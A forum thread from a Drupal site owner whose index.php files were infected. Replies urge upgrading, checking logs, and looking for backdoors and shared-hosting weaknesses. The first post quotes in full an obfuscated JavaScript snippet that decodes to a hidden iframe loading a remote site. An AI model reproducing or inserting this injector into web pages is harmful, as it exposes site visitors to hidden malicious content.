Hi guys so my site was hacked into it's drupal 5.0 installation. I don't have time right now to upgrade because it was my first ever drupal install and I did that before I read the book (unfortunately). Which means my themes are in /themes and my modules are in /modules and not in /sites/all. Plus I did some other hacking around to make it work.
What happened was every index.php that I had was appended with the following which attempts to do something on some Chinese website:
<script>function v476698ea5a725(v476698ea5aef5){ return(parseInt(v476698ea5aef5,16));}function v476698ea5c664(v476698ea5ce34){ function v476698ea5e5a3 () {return 2;} var v476698ea5d603='';for(v476698ea5ddd3=0; v476698ea5ddd3< v476698ea5ce34.length; v476698ea5ddd3+=v476698ea5e5a3()){ v476698ea5d603+=(String.fromCharCode(v476698ea5a725(v476698ea5ce34.substr(v476698ea5ddd3, v476698ea5e5a3()))));}return v476698ea5d603;} document.write(v476698ea5c664('3C696672616D65206E616D653D27623427207372633D27687474703A2F2F6669726577616C6C6C61622E636E2F61647061636B2F696E6465782E706870272077696474683D323737206865696768743D3730207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>
The question is, can I do something to my current install, without upgrading to drupal 5.5, to prevent such things from happening?
Thanks,
Vlad
Comments
=-=
disable them and move them
which is why hacking core is a no no. Build modules that work with core, don't hack core.
upgrading from 5.0 - 5.5 is as simple as overwriting all your core files, INCLUDING settings.php
maintain your site properly and upgrade as soon as a new release is let out. 5 security releases behind is leaving you open to quite a few exploits that are and have been public for soemtime now.
also note that security breeches should be reported to the security team not posted publicly in the forum. Though the fact that you are still using 5.0 would mean that the security team would more then likely also tell you to upgrade your installation.
_____________________________________________________________________
My posts & comments are usually dripping with sarcasm.
If you ask nicely I'll give you a towel : )
Thanks, yes, I understand
Thanks, yes, I understand all that you said I will try to do a test upgrade and will see how it goes. Again it was my first drupal project and my time was so limited that I had no minute to open a book and consult with it to get things done properly. Things like that happen.
As of today I am doing things more correctly for other projects.
Well here I am again, I
Well here I am again, I upgraded to Drupal 5.5, I only retained a database and a theme. Everything else was upgraded and installed properly in sites/all/modules etc.
I managed to login to admin interface a few times, and now two days later, I have exact same issue.
at the bottom of all index.php files. Well I cleaned it, but now I cannot login still :( and when I enter username and password, in the status bar I see that there are attempts to go to somesite.cn, unsuccessfully. And it halts. I am getting in touch with security team.Its may not be Drupal...
Your issue may not be with Drupal. Have you checked your SSH/SFTP logins? grepped through your apache access logs.
If they hacked your site through Drupal it was definitely captured in the logs. If you they hacked your site by FTP or SSHing in well you have a different issue. I understand your site is Drupal based but don't forget that Drupal is on an operating system (that can be hacked), on a webserver (that can be hacked), used a DB (that can be hacked).
You have multiples places on entry don't focus on just one.
Yes, I understand that, I am
Yes, I understand that, I am not blaming drupal for all my problems. I love this CMS, hopefully I'll get to the bottom of it and report back.
didn't mean to imply...
Sorry I didn't mean to imply that you were blaming Drupal, I was just trying to make sure that you've covered all bases. Like someone else said hacks can happen in many places so its good to make sure you check all of your log to try and nail down exactly what's going on.
the index.php is generally the first file that any hack/virus is going to go after as its generally the frontpage.
UPDATE: I found malicious
UPDATE:
I found malicious code in main.php too which is a file of gallery2. After I removed it, it works normal again. I'll study FTP logs.
There are a lot of different
There are a lot of different ways for this to happen. A very common thing for defacers to do is to drop a file that looks innocent somewhere in your web directory. That file gives them a full back door to your site. Commonly, they are put places where files would normally be uploaded, like in an avatar or image directory.
Another way it can happen has nothing to do with your site. If you are hosted on a server that does not have adequate protection between customers, then the attacker may exploit a problem with some other site, then be able to go in and make changes to your site as well.
Jerry